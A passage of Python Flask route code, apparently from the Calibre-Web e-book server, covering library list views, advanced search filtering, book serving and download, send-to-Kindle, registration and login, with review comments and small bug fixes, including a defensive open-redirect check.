        order = [text(sort + " " + order)]
    elif not state:
        order = [db.Books.timestamp.desc()]
    total_count = filtered_count = calibre_db.session.query(db.Books).count()
    if state:
        # Restore a previous checkbox selection; sort selected rows first.
        if search:
            books = calibre_db.search_query(search).all()
            filtered_count = len(books)
        else:
            books = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).all()
        entries = calibre_db.get_checkbox_sorted(books, state, off, limit, order)
    elif search:
        entries, filtered_count, __ = calibre_db.get_search_results(search, off, order, limit, *join)
    else:
        entries, __, __ = calibre_db.fill_indexpage((int(off) / (int(limit)) + 1), limit, db.Books, True, order, *join)
    # Attach display names for each book's languages.
    for entry in entries:
        for index in range(0, len(entry.languages)):
            entry.languages[index].language_name = isoLanguages.get_language_name(get_locale(), entry.languages[
                index].lang_code)
            #try:
            #    entry.languages[index].language_name = LC.parse(entry.languages[index].lang_code)\
            #        .get_language_name(get_locale())
            #except UnknownLocaleError:
            #    entry.languages[index].language_name = _(
            #        isoLanguages.get(part3=entry.languages[index].lang_code).name)
    table_entries = {'totalNotFiltered': total_count, 'total': filtered_count, "rows": entries}
    js_list = json.dumps(table_entries, cls=db.AlchemyEncoder)
    response = make_response(js_list)
    response.headers["Content-Type"] = "application/json; charset=utf-8"
    return response
@web.route("/ajax/table_settings", methods=['POST'])
@login_required
def update_table_settings():
    """Persist the current user's book-table column settings.

    The request body is the raw JSON settings object; it is stored in the
    user's ``view_settings['table']`` entry.  Returns an empty 200 response
    on success, or 400 on a database error.
    """
    # vals = request.get_json()
    # ToDo: Save table settings
    current_user.view_settings['table'] = json.loads(request.data)
    try:
        try:
            # view_settings is a JSON-mapped column; in-place mutation does
            # not mark it dirty, so flag the attribute explicitly.
            flag_modified(current_user, "view_settings")
        except AttributeError:
            pass
        ub.session.commit()
    except (InvalidRequestError, OperationalError):
        # Roll back so the session remains usable after a failed commit.
        ub.session.rollback()
        log.error("Invalid request received: %r ", request, )
        return "Invalid request", 400
    return ""
@web.route("/author")
@login_required_if_no_ano
def author_list():
    """List all visible authors with book counts and a first-letter index."""
    if current_user.check_visibility(constants.SIDEBAR_AUTHOR):
        if current_user.get_view_property('author', 'dir') == 'desc':
            order = db.Authors.sort.desc()
            order_no = 0
        else:
            order = db.Authors.sort.asc()
            order_no = 1
        entries = calibre_db.session.query(db.Authors, func.count('books_authors_link.book').label('count')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_authors_link.author')).order_by(order).all()
        charlist = calibre_db.session.query(func.upper(func.substr(db.Authors.sort, 1, 1)).label('char')) \
            .join(db.books_authors_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Authors.sort, 1, 1))).all()
        # If not creating a copy, readonly databases can not display authornames with "|" in it as changing the name
        # starts a change session
        autor_copy = copy.deepcopy(entries)
        for entry in autor_copy:
            entry.Authors.name = entry.Authors.name.replace('|', ',')
        return render_title_template('list.html', entries=autor_copy, folder='web.books_list', charlist=charlist,
                                     title=u"Authors", page="authorlist", data='author', order=order_no)
    else:
        abort(404)
@web.route("/downloadlist")
@login_required_if_no_ano
def download_list():
    """List users with their download counts (admins only); 404 otherwise."""
    if current_user.get_view_property('download', 'dir') == 'desc':
        order = ub.User.name.desc()
        order_no = 0
    else:
        order = ub.User.name.asc()
        order_no = 1
    if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD) and current_user.role_admin():
        entries = ub.session.query(ub.User, func.count(ub.Downloads.book_id).label('count'))\
            .join(ub.Downloads).group_by(ub.Downloads.user_id).order_by(order).all()
        # First-letter index, excluding the anonymous pseudo-user.
        charlist = ub.session.query(func.upper(func.substr(ub.User.name, 1, 1)).label('char')) \
            .filter(ub.User.role.op('&')(constants.ROLE_ANONYMOUS) != constants.ROLE_ANONYMOUS) \
            .group_by(func.upper(func.substr(ub.User.name, 1, 1))).all()
        return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                     title=_(u"Downloads"), page="downloadlist", data="download", order=order_no)
    else:
        abort(404)
@web.route("/publisher")
@login_required_if_no_ano
def publisher_list():
    """List all visible publishers with book counts and a first-letter index."""
    if current_user.get_view_property('publisher', 'dir') == 'desc':
        order = db.Publishers.name.desc()
        order_no = 0
    else:
        order = db.Publishers.name.asc()
        order_no = 1
    if current_user.check_visibility(constants.SIDEBAR_PUBLISHER):
        entries = calibre_db.session.query(db.Publishers, func.count('books_publishers_link.book').label('count')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_publishers_link.publisher')).order_by(order).all()
        charlist = calibre_db.session.query(func.upper(func.substr(db.Publishers.name, 1, 1)).label('char')) \
            .join(db.books_publishers_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Publishers.name, 1, 1))).all()
        return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                     title=_(u"Publishers"), page="publisherlist", data="publisher", order=order_no)
    else:
        abort(404)
@web.route("/series")
@login_required_if_no_ano
def series_list():
    """List all visible series, either as a plain list or as a cover grid."""
    if current_user.check_visibility(constants.SIDEBAR_SERIES):
        if current_user.get_view_property('series', 'dir') == 'desc':
            order = db.Series.sort.desc()
            order_no = 0
        else:
            order = db.Series.sort.asc()
            order_no = 1
        if current_user.get_view_property('series', 'series_view') == 'list':
            entries = calibre_db.session.query(db.Series, func.count('books_series_link.book').label('count')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(order).all()
            charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            # NOTE(review): unlike the grid branch below, this call does not
            # pass order=order_no to the template — confirm whether the list
            # view is meant to show the sort-direction toggle.
            return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                         title=_(u"Series"), page="serieslist", data="series")
        else:
            # Grid view: query one representative book per series for covers.
            entries = calibre_db.session.query(db.Books, func.count('books_series_link').label('count')) \
                .join(db.books_series_link).join(db.Series).filter(calibre_db.common_filters()) \
                .group_by(text('books_series_link.series')).order_by(order).all()
            charlist = calibre_db.session.query(func.upper(func.substr(db.Series.sort, 1, 1)).label('char')) \
                .join(db.books_series_link).join(db.Books).filter(calibre_db.common_filters()) \
                .group_by(func.upper(func.substr(db.Series.sort, 1, 1))).all()
            return render_title_template('grid.html', entries=entries, folder='web.books_list', charlist=charlist,
                                         title=_(u"Series"), page="serieslist", data="series", bodyClass="grid-view",
                                         order=order_no)
    else:
        abort(404)
@web.route("/ratings")
@login_required_if_no_ano
def ratings_list():
    """List all used ratings with book counts; star value is rating/2."""
    if current_user.check_visibility(constants.SIDEBAR_RATING):
        if current_user.get_view_property('ratings', 'dir') == 'desc':
            order = db.Ratings.rating.desc()
            order_no = 0
        else:
            order = db.Ratings.rating.asc()
            order_no = 1
        # Calibre stores ratings doubled (0-10); expose halved value as 'name'.
        entries = calibre_db.session.query(db.Ratings, func.count('books_ratings_link.book').label('count'),
                                           (db.Ratings.rating / 2).label('name')) \
            .join(db.books_ratings_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(text('books_ratings_link.rating')).order_by(order).all()
        return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
                                     title=_(u"Ratings list"), page="ratingslist", data="ratings", order=order_no)
    else:
        abort(404)
@web.route("/formats")
@login_required_if_no_ano
def formats_list():
    """List all file formats in the library with book counts."""
    if current_user.check_visibility(constants.SIDEBAR_FORMAT):
        # NOTE(review): this reads the 'ratings' view property, not 'formats'
        # — looks like a copy-paste from ratings_list; confirm which settings
        # key the frontend stores the format sort direction under.
        if current_user.get_view_property('ratings', 'dir') == 'desc':
            order = db.Data.format.desc()
            order_no = 0
        else:
            order = db.Data.format.asc()
            order_no = 1
        entries = calibre_db.session.query(db.Data,
                                           func.count('data.book').label('count'),
                                           db.Data.format.label('format')) \
            .join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(db.Data.format).order_by(order).all()
        return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=list(),
                                     title=_(u"File formats list"), page="formatslist", data="formats", order=order_no)
    else:
        abort(404)
@web.route("/language")
@login_required_if_no_ano
def language_overview():
    """List book languages visible to the current user with per-language counts.

    When the user is restricted to a single language, only that language is
    shown; otherwise all languages spoken in the library are listed.
    """
    if current_user.check_visibility(constants.SIDEBAR_LANGUAGE):
        charlist = list()
        if current_user.filter_language() == u"all":
            languages = calibre_db.speaking_language()
            # ToDo: generate first character list for languages
        else:
            languages = calibre_db.session.query(db.Languages).filter(
                db.Languages.lang_code == current_user.filter_language()).all()
            # Resolve the ISO code to a display name.  Bug fix: this read
            # languages[0].name.lang_code, but 'name' is only assigned on
            # this line — the code must come from the row's lang_code column.
            languages[0].name = isoLanguages.get_language_name(get_locale(), languages[0].lang_code)
        lang_counter = calibre_db.session.query(db.books_languages_link,
                                                func.count('books_languages_link.book').label('bookcount')).group_by(
            text('books_languages_link.lang_code')).all()
        return render_title_template('languages.html', languages=languages, lang_counter=lang_counter,
                                     charlist=charlist, title=_(u"Languages"), page="langlist",
                                     data="language")
    else:
        abort(404)
@web.route("/category")
@login_required_if_no_ano
def category_list():
    """List all visible categories (tags) with book counts and a letter index."""
    if current_user.check_visibility(constants.SIDEBAR_CATEGORY):
        if current_user.get_view_property('category', 'dir') == 'desc':
            order = db.Tags.name.desc()
            order_no = 0
        else:
            order = db.Tags.name.asc()
            order_no = 1
        entries = calibre_db.session.query(db.Tags, func.count('books_tags_link.book').label('count')) \
            .join(db.books_tags_link).join(db.Books).order_by(order).filter(calibre_db.common_filters()) \
            .group_by(text('books_tags_link.tag')).all()
        charlist = calibre_db.session.query(func.upper(func.substr(db.Tags.name, 1, 1)).label('char')) \
            .join(db.books_tags_link).join(db.Books).filter(calibre_db.common_filters()) \
            .group_by(func.upper(func.substr(db.Tags.name, 1, 1))).all()
        return render_title_template('list.html', entries=entries, folder='web.books_list', charlist=charlist,
                                     title=_(u"Categories"), page="catlist", data="category", order=order_no)
    else:
        abort(404)
# ################################### Task functions ################################################################
@web.route("/tasks")
@login_required
def get_tasks_status():
    """Render the background task overview page."""
    # if current user admin, show all email, otherwise only own emails
    task_list = WorkerThread.getInstance().tasks
    rendered_tasks = render_task_status(task_list)
    return render_title_template('tasks.html', entries=rendered_tasks, title=_(u"Tasks"), page="tasks")
@app.route("/reconnect")
def reconnect():
    """Drop and reopen the connection to the Calibre database.

    NOTE(review): this route has no login decorator, so it is reachable
    without authentication — confirm that is intentional (it appears to be
    a maintenance/updater hook).
    """
    calibre_db.reconnect_db(config, ub.app_DB_path)
    return json.dumps({})
# ################################### Search functions ################################################################
@web.route("/search", methods=["GET"])
@login_required_if_no_ano
def search():
    """Redirect a quick-search query to the book list, or show the empty form."""
    query = request.args.get("query")
    if not query:
        return render_title_template('search.html',
                                     searchterm="",
                                     result_count=0,
                                     title=_(u"Search"),
                                     page="search")
    return redirect(url_for('web.books_list', data="search", sort_param='stored', query=query))
@web.route("/advsearch", methods=['POST'])
@login_required_if_no_ano
def advanced_search():
    """Store the advanced-search form in the session and redirect to the results."""
    multiselect_keys = ('include_tag', 'exclude_tag', 'include_serie', 'exclude_serie',
                        'include_shelf', 'exclude_shelf', 'include_language', 'exclude_language',
                        'include_extension', 'exclude_extension')
    values = dict(request.form)
    # Multi-select fields can carry several values; collect all of them.
    for key in multiselect_keys:
        values[key] = list(request.form.getlist(key))
    flask_session['query'] = json.dumps(values)
    return redirect(url_for('web.books_list', data="advsearch", sort_param='stored', query=""))
def adv_search_custom_columns(cc, term, q):
    """Apply the custom-column criteria from the advanced-search form to *q*."""
    for column in cc:
        field = 'custom_column_' + str(column.id)
        if column.datatype == "datetime":
            # Date columns provide a start/end range instead of a single value.
            date_from = term.get(field + '_start')
            date_to = term.get(field + '_end')
            if date_from:
                q = q.filter(getattr(db.Books, field).any(
                    func.datetime(db.cc_classes[column.id].value) >= func.datetime(date_from)))
            if date_to:
                q = q.filter(getattr(db.Books, field).any(
                    func.datetime(db.cc_classes[column.id].value) <= func.datetime(date_to)))
        else:
            entered = term.get(field)
            if entered is not None and entered != '':
                if column.datatype == 'bool':
                    q = q.filter(getattr(db.Books, field).any(
                        db.cc_classes[column.id].value == (entered == "True")))
                elif column.datatype == 'int' or column.datatype == 'float':
                    q = q.filter(getattr(db.Books, field).any(
                        db.cc_classes[column.id].value == entered))
                elif column.datatype == 'rating':
                    # Form rating is in stars (0-5); stored value is doubled.
                    q = q.filter(getattr(db.Books, field).any(
                        db.cc_classes[column.id].value == int(float(entered) * 2)))
                else:
                    # Text-like columns: case-insensitive substring match.
                    q = q.filter(getattr(db.Books, field).any(
                        func.lower(db.cc_classes[column.id].value).ilike("%" + entered + "%")))
    return q
def adv_search_language(q, include_languages_inputs, exclude_languages_inputs):
    """Apply language include/exclude filters from the advanced search to *q*.

    A user-level language restriction overrides the form selection entirely.
    """
    if current_user.filter_language() != "all":
        q = q.filter(db.Books.languages.any(db.Languages.lang_code == current_user.filter_language()))
    else:
        for language in include_languages_inputs:
            q = q.filter(db.Books.languages.any(db.Languages.id == language))
        for language in exclude_languages_inputs:
            # Bug fix: this previously filtered on db.Books.series, so
            # excluded languages were never actually excluded.
            q = q.filter(not_(db.Books.languages.any(db.Languages.id == language)))
    return q
def adv_search_ratings(q, rating_high, rating_low):
    """Constrain *q* to books whose rating lies in the requested star range.

    Form values are in stars (0-5); stored ratings are doubled (0-10).
    """
    if rating_high:
        q = q.filter(db.Books.ratings.any(db.Ratings.rating <= int(rating_high) * 2))
    if rating_low:
        q = q.filter(db.Books.ratings.any(db.Ratings.rating >= int(rating_low) * 2))
    return q
def adv_search_read_status(q, read_status):
    """Filter *q* by read/unread state ("True"/"False" string, empty = no filter).

    Uses Calibre-Web's ReadBook table, or the configured Calibre custom
    column when ``config_read_column`` is set.
    """
    if read_status:
        if config.config_read_column:
            try:
                if read_status == "True":
                    q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(db.cc_classes[config.config_read_column].value == True)
                else:
                    # coalesce() treats books with no column row as unread.
                    q = q.join(db.cc_classes[config.config_read_column], isouter=True) \
                        .filter(coalesce(db.cc_classes[config.config_read_column].value, False) != True)
            except (KeyError, AttributeError):
                # Configured custom column does not exist; warn and leave q unfiltered.
                log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
                flash(_("Custom Column No.%(column)d is not existing in calibre database",
                        column=config.config_read_column),
                      category="error")
                return q
        else:
            if read_status == "True":
                q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(current_user.id),
                            ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
            else:
                q = q.join(ub.ReadBook, db.Books.id == ub.ReadBook.book_id, isouter=True) \
                    .filter(ub.ReadBook.user_id == int(current_user.id),
                            coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED)
    return q
def adv_search_extension(q, include_extension_inputs, exclude_extension_inputs):
    """Filter *q* by included and excluded file formats."""
    for fmt in include_extension_inputs:
        q = q.filter(db.Books.data.any(db.Data.format == fmt))
    for fmt in exclude_extension_inputs:
        q = q.filter(not_(db.Books.data.any(db.Data.format == fmt)))
    return q
def adv_search_tag(q, include_tag_inputs, exclude_tag_inputs):
    """Filter *q* by included and excluded tag ids."""
    for tag_id in include_tag_inputs:
        q = q.filter(db.Books.tags.any(db.Tags.id == tag_id))
    for tag_id in exclude_tag_inputs:
        q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag_id)))
    return q
def adv_search_serie(q, include_series_inputs, exclude_series_inputs):
    """Filter *q* by included and excluded series ids."""
    for series_id in include_series_inputs:
        q = q.filter(db.Books.series.any(db.Series.id == series_id))
    for series_id in exclude_series_inputs:
        q = q.filter(not_(db.Books.series.any(db.Series.id == series_id)))
    return q
def adv_search_shelf(q, include_shelf_inputs, exclude_shelf_inputs):
    """Filter *q* by shelf membership (include and exclude lists of shelf ids)."""
    # Outer join so books on no shelf at all survive the exclusion filter
    # (shelf == None compiles to IS NULL in SQLAlchemy).
    q = q.outerjoin(ub.BookShelf, db.Books.id == ub.BookShelf.book_id)\
        .filter(or_(ub.BookShelf.shelf == None, ub.BookShelf.shelf.notin_(exclude_shelf_inputs)))
    if include_shelf_inputs:
        q = q.filter(ub.BookShelf.shelf.in_(include_shelf_inputs))
    return q
def extend_search_term(searchterm,
                       author_name,
                       book_title,
                       publisher,
                       pub_start,
                       pub_end,
                       tags,
                       rating_high,
                       rating_low,
                       read_status,
                       ):
    """Build the human-readable summary string of an advanced search.

    Returns the joined summary plus the (possibly reset) publication range:
    an unparsable date is cleared so it is not applied as a filter later.
    """
    searchterm.extend((author_name.replace('|', ','), book_title, publisher))
    if pub_start:
        try:
            searchterm.extend([_(u"Published after ") +
                               format_date(datetime.strptime(pub_start, "%Y-%m-%d"),
                                           format='medium', locale=get_locale())])
        except ValueError:
            pub_start = u""
    if pub_end:
        try:
            searchterm.extend([_(u"Published before ") +
                               format_date(datetime.strptime(pub_end, "%Y-%m-%d"),
                                           format='medium', locale=get_locale())])
        except ValueError:
            # Bug fix: an invalid end date previously reset pub_start,
            # leaving the bad pub_end value active as a filter.
            pub_end = u""
    elements = {'tag': db.Tags, 'serie': db.Series, 'shelf': ub.Shelf}
    for key, db_element in elements.items():
        # Resolve included/excluded ids to display names.
        tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['include_' + key])).all()
        searchterm.extend(tag.name for tag in tag_names)
        tag_names = calibre_db.session.query(db_element).filter(db_element.id.in_(tags['exclude_' + key])).all()
        searchterm.extend(tag.name for tag in tag_names)
    language_names = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(tags['include_language'])).all()
    if language_names:
        language_names = calibre_db.speaking_language(language_names)
    searchterm.extend(language.name for language in language_names)
    language_names = calibre_db.session.query(db.Languages). \
        filter(db.Languages.id.in_(tags['exclude_language'])).all()
    if language_names:
        language_names = calibre_db.speaking_language(language_names)
    searchterm.extend(language.name for language in language_names)
    if rating_high:
        searchterm.extend([_(u"Rating <= %(rating)s", rating=rating_high)])
    if rating_low:
        searchterm.extend([_(u"Rating >= %(rating)s", rating=rating_low)])
    if read_status:
        searchterm.extend([_(u"Read Status = %(status)s", status=read_status)])
    searchterm.extend(ext for ext in tags['include_extension'])
    searchterm.extend(ext for ext in tags['exclude_extension'])
    # handle custom columns
    searchterm = " + ".join(filter(None, searchterm))
    return searchterm, pub_start, pub_end
def render_adv_search_results(term, offset=None, order=None, limit=None):
    """Execute an advanced search described by *term* and render the results.

    *term* is the (form-shaped) dict of search criteria; offset/limit give
    optional paging.  Results are stored via ub.store_ids for later reuse.
    """
    order = order or [db.Books.sort]
    pagination = None
    cc = get_cc_columns(filter_config_custom_read=True)
    # Register a Python lower() with SQLite so ilike works on non-ASCII text.
    calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
    q = calibre_db.session.query(db.Books).outerjoin(db.books_series_link, db.Books.id == db.books_series_link.c.book)\
        .outerjoin(db.Series)\
        .filter(calibre_db.common_filters(True))
    # parse multiselects to a complete dict
    tags = dict()
    elements = ['tag', 'serie', 'shelf', 'language', 'extension']
    for element in elements:
        tags['include_' + element] = term.get('include_' + element)
        tags['exclude_' + element] = term.get('exclude_' + element)
    author_name = term.get("author_name")
    book_title = term.get("book_title")
    publisher = term.get("publisher")
    pub_start = term.get("publishstart")
    pub_end = term.get("publishend")
    # NOTE(review): 'ratinghigh' feeds rating_low and 'ratinglow' feeds
    # rating_high — this looks swapped; confirm against the form field
    # semantics before changing.
    rating_low = term.get("ratinghigh")
    rating_high = term.get("ratinglow")
    description = term.get("comment")
    read_status = term.get("read_status")
    if author_name:
        author_name = author_name.strip().lower().replace(',', '|')
    if book_title:
        book_title = book_title.strip().lower()
    if publisher:
        publisher = publisher.strip().lower()
    searchterm = []
    cc_present = False
    # Collect human-readable descriptions of any custom-column criteria.
    for c in cc:
        if c.datatype == "datetime":
            column_start = term.get('custom_column_' + str(c.id) + '_start')
            column_end = term.get('custom_column_' + str(c.id) + '_end')
            if column_start:
                searchterm.extend([u"{} >= {}".format(c.name,
                                                      format_date(datetime.strptime(column_start, "%Y-%m-%d"),
                                                                  format='medium',
                                                                  locale=get_locale())
                                                      )])
                cc_present = True
            if column_end:
                searchterm.extend([u"{} <= {}".format(c.name,
                                                      format_date(datetime.strptime(column_end, "%Y-%m-%d").date(),
                                                                  format='medium',
                                                                  locale=get_locale())
                                                      )])
                cc_present = True
        elif term.get('custom_column_' + str(c.id)):
            searchterm.extend([(u"{}: {}".format(c.name, term.get('custom_column_' + str(c.id))))])
            cc_present = True
    # Only build and run the filtered query when at least one criterion was given.
    if any(tags.values()) or author_name or book_title or publisher or pub_start or pub_end or rating_low \
       or rating_high or description or cc_present or read_status:
        searchterm, pub_start, pub_end = extend_search_term(searchterm,
                                                            author_name,
                                                            book_title,
                                                            publisher,
                                                            pub_start,
                                                            pub_end,
                                                            tags,
                                                            rating_high,
                                                            rating_low,
                                                            read_status)
        # No-op filter call (kept as-is; has no effect on the query).
        q = q.filter()
        if author_name:
            q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_name + "%")))
        if book_title:
            q = q.filter(func.lower(db.Books.title).ilike("%" + book_title + "%"))
        if pub_start:
            q = q.filter(func.datetime(db.Books.pubdate) > func.datetime(pub_start))
        if pub_end:
            q = q.filter(func.datetime(db.Books.pubdate) < func.datetime(pub_end))
        q = adv_search_read_status(q, read_status)
        if publisher:
            q = q.filter(db.Books.publishers.any(func.lower(db.Publishers.name).ilike("%" + publisher + "%")))
        q = adv_search_tag(q, tags['include_tag'], tags['exclude_tag'])
        q = adv_search_serie(q, tags['include_serie'], tags['exclude_serie'])
        q = adv_search_shelf(q, tags['include_shelf'], tags['exclude_shelf'])
        q = adv_search_extension(q, tags['include_extension'], tags['exclude_extension'])
        q = adv_search_language(q, tags['include_language'], tags['exclude_language'])
        q = adv_search_ratings(q, rating_high, rating_low)
        if description:
            q = q.filter(db.Books.comments.any(func.lower(db.Comments.text).ilike("%" + description + "%")))
        # search custom culumns
        try:
            q = adv_search_custom_columns(cc, term, q)
        except AttributeError as ex:
            log.debug_or_exception(ex)
            flash(_("Error on search for custom columns, please restart Calibre-Web"), category="error")
    q = q.order_by(*order).all()
    flask_session['query'] = json.dumps(term)
    ub.store_ids(q)
    result_count = len(q)
    if offset != None and limit != None:
        offset = int(offset)
        limit_all = offset + int(limit)
        pagination = Pagination((offset / (int(limit)) + 1), limit, result_count)
    else:
        offset = 0
        limit_all = result_count
    return render_title_template('search.html',
                                 adv_searchterm=searchterm,
                                 pagination=pagination,
                                 entries=q[offset:limit_all],
                                 result_count=result_count,
                                 title=_(u"Advanced Search"), page="advsearch")
@web.route("/advsearch", methods=['GET'])
@login_required_if_no_ano
def advanced_search_form():
    """Display the advanced-search form, including custom-column inputs."""
    # Build custom columns names
    return render_prepare_search_form(get_cc_columns(filter_config_custom_read=True))
# ################################### Download/Send ##################################################################
@web.route("/cover/<int:book_id>")
@login_required_if_no_ano
def get_cover(book_id):
    """Serve the cover image for the given book id."""
    return get_book_cover(book_id)
@web.route("/robots.txt")
def get_robots():
    """Serve the static robots.txt file (no login required)."""
    return send_from_directory(constants.STATIC_DIR, "robots.txt")
@web.route("/show/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/show/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@viewer_required
def serve_book(book_id, book_format, anyname):
    """Stream a book file for the in-browser viewers.

    TXT files are charset-detected and re-encoded to UTF-8; everything else
    is served verbatim from Google Drive or the local Calibre directory.
    """
    book_format = book_format.split(".")[0]
    book = calibre_db.get_book(book_id)
    data = calibre_db.get_book_format(book_id, book_format.upper())
    if not data:
        return "File not in Database"
    log.info('Serving book: %s', data.name)
    if config.config_use_google_drive:
        try:
            headers = Headers()
            headers["Content-Type"] = mimetypes.types_map.get('.' + book_format, "application/octet-stream")
            df = getFileFromEbooksFolder(book.path, data.name + "." + book_format)
            return do_gdrive_download(df, headers, (book_format.upper() == 'TXT'))
        except AttributeError as ex:
            log.debug_or_exception(ex)
            return "File Not Found"
    else:
        if book_format.upper() == 'TXT':
            try:
                # Fix: the original leaked the file handle
                # (open(...).read() without close); use a context manager.
                with open(os.path.join(config.config_calibre_dir, book.path,
                                       data.name + "." + book_format), "rb") as txt_file:
                    rawdata = txt_file.read()
                result = chardet.detect(rawdata)
                return make_response(
                    rawdata.decode(result['encoding'], 'surrogatepass').encode('utf-8', 'surrogatepass'))
            except FileNotFoundError:
                log.error("File Not Found")
                return "File Not Found"
        return send_from_directory(os.path.join(config.config_calibre_dir, book.path), data.name + "." + book_format)
@web.route("/download/<int:book_id>/<book_format>", defaults={'anyname': 'None'})
@web.route("/download/<int:book_id>/<book_format>/<anyname>")
@login_required_if_no_ano
@download_required
def download_link(book_id, book_format, anyname):
    """Serve a book file for download; tag Kobo clients so the helper can adapt."""
    # Fix: requests without a User-Agent header made `"Kobo" in None`
    # raise TypeError; default to an empty string.
    client = "kobo" if "Kobo" in request.headers.get('User-Agent', "") else ""
    return get_download_link(book_id, book_format, client)
@web.route('/send/<int:book_id>/<book_format>/<int:convert>')
@login_required
@download_required
def send_to_kindle(book_id, book_format, convert):
    """Queue a book for e-mail delivery to the user's Send-to-Kindle address."""
    if not config.get_mail_server_configured():
        flash(_(u"Please configure the SMTP mail settings first..."), category="error")
    elif current_user.kindle_mail:
        result = send_mail(book_id, book_format, convert, current_user.kindle_mail, config.config_calibre_dir,
                           current_user.name)
        if result is None:
            flash(_(u"Book successfully queued for sending to %(kindlemail)s", kindlemail=current_user.kindle_mail),
                  category="success")
            ub.update_download(book_id, int(current_user.id))
        else:
            flash(_(u"Oops! There was an error sending this book: %(res)s", res=result), category="error")
    else:
        flash(_(u"Please update your profile with a valid Send to Kindle E-mail Address."), category="error")
    if "HTTP_REFERER" in request.environ:
        # Security fix (CWE-601 open redirect): the Referer header is fully
        # client-controlled. Follow it only when it is a relative reference
        # or explicitly points back at this host.
        referer = request.environ["HTTP_REFERER"]
        if urlparse(referer).netloc in ('', request.host):
            return redirect(referer)
    return redirect(url_for('web.index'))
# ################################### Login Logout ##################################################################
@web.route('/register', methods=['GET', 'POST'])
def register():
    """Self-registration: create an account and mail out a generated password.

    Only active when public registration is enabled and an SMTP server is
    configured (the initial password is delivered by e-mail).
    """
    if not config.config_public_reg:
        abort(404)
    if current_user is not None and current_user.is_authenticated:
        return redirect(url_for('web.index'))
    if not config.get_mail_server_configured():
        flash(_(u"E-Mail server is not configured, please contact your administrator!"), category="error")
        return render_title_template('register.html', title=_("Register"), page="register")
    if request.method == "POST":
        to_save = request.form.to_dict()
        # depending on config the login name is either the e-mail or a free name
        nickname = to_save["email"].strip() if config.config_register_email else to_save.get('name')
        if not nickname or not to_save.get("email"):
            flash(_(u"Please fill out all fields!"), category="error")
            return render_title_template('register.html', title=_("Register"), page="register")
        try:
            # validators raise on duplicates / malformed values
            nickname = check_username(nickname)
            email = check_email(to_save["email"])
        except Exception as ex:
            flash(str(ex), category="error")
            return render_title_template('register.html', title=_("Register"), page="register")
        content = ub.User()
        if check_valid_domain(email):
            content.name = nickname
            content.email = email
            # user never sees this password directly; it is sent by mail
            password = generate_random_password()
            content.password = generate_password_hash(password)
            content.role = config.config_default_role
            content.sidebar_view = config.config_default_show
            try:
                ub.session.add(content)
                ub.session.commit()
                if feature_support['oauth']:
                    register_user_with_oauth(content)
                send_registration_mail(to_save["email"].strip(), nickname, password)
            except Exception:
                ub.session.rollback()
                flash(_(u"An unknown error occurred. Please try again later."), category="error")
                return render_title_template('register.html', title=_("Register"), page="register")
        else:
            # domain is on the admin's deny list
            flash(_(u"Your e-mail is not allowed to register"), category="error")
            log.warning('Registering failed for user "%s" e-mail address: %s', nickname, to_save["email"])
            return render_title_template('register.html', title=_("Register"), page="register")
        flash(_(u"Confirmation e-mail was send to your e-mail account."), category="success")
        return redirect(url_for('web.login'))
    if feature_support['oauth']:
        register_user_with_oauth()
    return render_title_template('register.html', config=config, title=_("Register"), page="register")
@web.route('/login', methods=['GET', 'POST'])
def login():
    """Render the login page and authenticate users (local or LDAP).

    Also handles the "forgot password" flow and the optional ``next``
    redirect target shown on the form after a successful login.
    """
    #if not config.db_configured:
    #    log.debug(u"Redirect to initial configuration")
    #    return redirect(url_for('admin.basic_configuration'))
    if current_user is not None and current_user.is_authenticated:
        return redirect(url_for('web.index'))
    if config.config_login_type == constants.LOGIN_LDAP and not services.ldap:
        log.error(u"Cannot activate LDAP authentication")
        flash(_(u"Cannot activate LDAP authentication"), category="error")
    if request.method == "POST":
        form = request.form.to_dict()
        user = ub.session.query(ub.User).filter(func.lower(ub.User.name) == form['username'].strip().lower()) \
            .first()
        if config.config_login_type == constants.LOGIN_LDAP and services.ldap and user and form['password'] != "":
            login_result, error = services.ldap.bind_user(form['username'], form['password'])
            if login_result:
                login_user(user, remember=bool(form.get('remember_me')))
                ub.store_user_session()
                log.debug(u"You are now logged in as: '%s'", user.name)
                flash(_(u"you are now logged in as: '%(nickname)s'", nickname=user.name),
                      category="success")
                return redirect_back(url_for("web.index"))
            elif login_result is None and user and check_password_hash(str(user.password), form['password']) \
                    and user.name != "Guest":
                # LDAP server unreachable -> fall back to the local password hash
                login_user(user, remember=bool(form.get('remember_me')))
                ub.store_user_session()
                log.info("Local Fallback Login as: '%s'", user.name)
                flash(_(u"Fallback Login as: '%(nickname)s', LDAP Server not reachable, or user not known",
